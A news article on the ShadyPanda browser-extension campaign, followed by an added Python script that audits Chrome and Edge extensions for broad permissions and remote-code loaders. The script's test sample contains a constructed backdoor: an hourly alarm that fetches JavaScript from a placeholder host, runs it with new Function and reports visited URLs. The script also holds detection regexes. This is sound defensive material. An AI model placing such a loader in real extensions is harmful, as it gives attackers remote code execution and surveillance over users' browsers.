ShadyPanda’s 7-Year Campaign Infects 4.3M Chrome and Edge Users

by CybrGPT

A seven-year browser extension campaign has infected 4.3 million Chrome and Edge users.

The group responsible, tracked as ShadyPanda, has been observed leveraging trusted browser marketplaces to build user bases, operate legitimately for years, then quietly deploy malicious updates.

A new Koi Security report identified a remote code execution backdoor affecting 300,000 users across five extensions, including Clean Master.

These extensions had operated normally since 2018, until a mid-2024 update enabled hourly downloads of arbitrary JavaScript. The malware logged website visits, exfiltrated encrypted browsing histories and gathered full browser fingerprints.

Meanwhile, a parallel spyware operation reached more than 4 million users through five additional Microsoft Edge extensions, most notably WeTab, which alone accounted for 3 million installs.

These extensions collected every URL visited, search term, mouse click and various browser identifiers, with traffic routed to servers in China.

Origins and Longevity Strategies

ShadyPanda’s earliest efforts date back to 2018, consistent with the seven-year span of the campaign, when the threat actor launched 145 browser extensions masquerading as wallpaper or productivity tools.

These add-ons injected affiliate codes on several shopping sites and used Google Analytics to profile user behavior. Koi researchers said the campaign revealed three lessons ShadyPanda would later exploit:

  • Limited post-approval monitoring

  • High trust in extensions with strong install counts

  • Advantages gained through long-term legitimacy


By early 2024, the group shifted toward aggressive browser manipulation. One extension, Infinity V+, redirected searches through a known hijacker, harvested cookies, and transmitted keystrokes to external servers.

Although many of these extensions were removed within weeks, ShadyPanda continued to refine its tradecraft, and later extensions were designed to stay benign long enough to pass review and accumulate installs before turning malicious.

Koi researchers attribute ShadyPanda’s longevity to a consistent gap in extension review processes.

“ShadyPanda proved that marketplaces still review extensions the same way they did seven years ago – static analysis at submission, trust after approval, no ongoing monitoring. Clean Master operated legitimately for five years. Static analysis wouldn’t catch this.” 

To defend against similar threats, individuals are advised to routinely audit installed browser extensions, remove tools they no longer use and favor developers with transparent update histories.
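The backdoor pattern described above (an extension that passes static review, then after an update schedules an hourly timer, fetches remote JavaScript and executes it) can be checked for in the extension directories of a Chrome or Edge profile. The script below is an added example written for this article, not Koi Security's tooling or anything from the extensions named above. The list of risky permissions, the regexes and the scoring are the author's own choices, the profile paths in the comments are assumptions that vary by OS and channel, and the two sample extensions are constructed for the demonstration.

```python
"""Audit Chrome/Edge extensions for broad permissions plus periodically fetched,
dynamically executed remote code. Added example; heuristics are the author's."""
import json
import re
from pathlib import Path

# Permissions that let an extension observe or alter every site the user visits.
RISKY_PERMISSIONS = {
    "<all_urls>", "tabs", "history", "cookies", "webRequest",
    "webRequestBlocking", "scripting", "declarativeNetRequest",
}

# Indicators of dynamically loaded or executed code. Timer + remote fetch +
# dynamic execution together is the "hourly download of arbitrary JS" pattern.
REMOTE_CODE_PATTERNS = {
    "eval_or_function": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "remote_fetch": re.compile(r"\b(fetch|importScripts)\s*\(\s*[\"'`]https?://"),
    "timer": re.compile(r"\bsetInterval\s*\(|chrome\.alarms\.create\s*\("),
    "script_injection": re.compile(r"chrome\.(tabs|scripting)\.executeScript\s*\("),
}


def audit_extension(manifest, scripts):
    """manifest: parsed manifest.json; scripts: {relative path: JS source}."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    indicators = {}
    for path, src in scripts.items():
        hits = sorted(name for name, rx in REMOTE_CODE_PATTERNS.items() if rx.search(src))
        if hits:
            indicators[path] = hits
    all_hits = {h for hits in indicators.values() for h in hits}
    remote_loader = {"timer", "remote_fetch", "eval_or_function"} <= all_hits
    # Crude triage score: one point per risky permission and per indicator,
    # three extra when the full remote-loader chain is present.
    score = len(perms & RISKY_PERMISSIONS) + 3 * remote_loader + len(all_hits)
    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "risky_permissions": sorted(perms & RISKY_PERMISSIONS),
        "indicators": indicators,
        "remote_code_loader": remote_loader,
        "score": score,
    }


def audit_profile(profile_dir):
    """Walk <profile>/Extensions/<id>/<version>/manifest.json and audit each one.
    Assumed default profile dirs: ~/.config/google-chrome/Default (Chrome),
    ~/.config/microsoft-edge/Default (Edge); adjust for your OS."""
    results = {}
    for manifest_path in Path(profile_dir, "Extensions").glob("*/*/manifest.json"):
        ext_dir = manifest_path.parent
        manifest = json.loads(manifest_path.read_text(encoding="utf-8", errors="replace"))
        scripts = {str(p.relative_to(ext_dir)): p.read_text(encoding="utf-8", errors="replace")
                   for p in ext_dir.rglob("*.js")}
        results[ext_dir.parent.name] = audit_extension(manifest, scripts)
    return results


# Constructed samples (not real extension code): a wallpaper tool before and
# after a hypothetical update that adds an hourly remote-code loader.
BENIGN_MANIFEST = {"name": "Wallpaper Tool", "version": "1.0", "manifest_version": 3,
                   "permissions": ["storage"]}
BENIGN_SCRIPTS = {"background.js": "chrome.storage.local.get('theme', t => applyTheme(t));"}
BACKDOORED_MANIFEST = {"name": "Wallpaper Tool", "version": "2.0", "manifest_version": 3,
                       "permissions": ["storage", "tabs", "cookies", "scripting"],
                       "host_permissions": ["<all_urls>"]}
BACKDOORED_SCRIPTS = {"background.js": """
chrome.alarms.create('sync', { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(async () => {
  const r = await fetch('https://example.invalid/payload.js');
  new Function(await r.text())();
});
chrome.tabs.onUpdated.addListener((id, info) => { if (info.url) report(info.url); });
"""}
BENIGN_ID, BACKDOORED_ID = "a" * 32, "b" * 32  # placeholder 32-char extension IDs


def demo():
    """Lay the two samples out like a real profile in a temp dir and audit it."""
    import tempfile
    root = Path(tempfile.mkdtemp())
    for ext_id, manifest, scripts in ((BENIGN_ID, BENIGN_MANIFEST, BENIGN_SCRIPTS),
                                      (BACKDOORED_ID, BACKDOORED_MANIFEST, BACKDOORED_SCRIPTS)):
        ext_dir = root / "Extensions" / ext_id / (manifest["version"] + "_0")
        ext_dir.mkdir(parents=True)
        (ext_dir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
        for name, src in scripts.items():
            (ext_dir / name).write_text(src, encoding="utf-8")
    return audit_profile(root)


if __name__ == "__main__":
    for ext_id, r in sorted(demo().items(), key=lambda kv: -kv[1]["score"]):
        print(ext_id, r["name"], r["version"], "score", r["score"], r["indicators"])
```

Run it against a real profile with `audit_profile("/path/to/Default")` and review anything with `remote_code_loader` set or a high score by hand; the regexes are deliberately broad, so a hit is a reason to read the code, not proof of malice. Note that this only inspects what is on disk now. An extension that has not yet received its malicious update looks clean, which is exactly the gap the report describes; the practical mitigation is to re-run the audit after updates and to treat a jump in requested permissions or a newly added timer-plus-fetch as a signal to remove the extension.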
